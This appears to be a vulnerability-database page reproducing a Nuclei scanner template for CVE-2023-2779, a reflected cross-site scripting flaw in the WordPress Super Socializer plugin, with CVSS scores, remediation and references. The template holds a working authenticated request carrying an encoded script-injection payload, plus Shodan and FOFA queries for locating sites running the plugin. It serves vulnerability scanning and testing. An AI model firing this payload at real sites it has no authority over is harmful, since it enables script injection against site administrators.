Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-2779
HistoryOct 17, 2023 - 7:20 a.m.

Super Socializer < 7.13.52 - Cross-Site Scripting

2023-10-1707:20:28
ProjectDiscovery
github.com
4
cve2023
wpscan
xss
wp-plugin
wordpress
authenticated
super-socializer
heator

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.009

Percentile

82.8%

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
id: CVE-2023-2779

info:
  name: Super Socializer < 7.13.52 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  remediation: Fixed in version 7.13.52
  reference:
    - https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2779
    - https://wordpress.org/plugins/super-socializer/
    - https://github.com/40826d/advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2779
    cwe-id: CWE-79
    epss-score: 0.0083
    epss-percentile: 0.8196
    cpe: cpe:2.3:a:heator:social_share\,_social_login_and_social_comments:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: heator
    product: social_share\,_social_login_and_social_comments
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/super-socializer/
    fofa-query: body=/wp-content/plugins/super-socializer/
    publicwww-query: "/wp-content/plugins/super-socializer/"
  tags: cve,cve2023,wpscan,xss,wp,wp-plugin,wordpress,authenticated,super-socializer,heator

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "facebook_urls")'
        condition: and
# digest: 4a0a0047304502205e3e768c0de86a746c4efad68576e82bc1fa30922c43c8345f523acf95f0f30e0221008f34d738ed0acf80b92b4989211cd0d3d817649036f5e72399ffc23ec8159866:922c64590222798bb761d5b6d8e72950

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

EPSS

0.009

Percentile

82.8%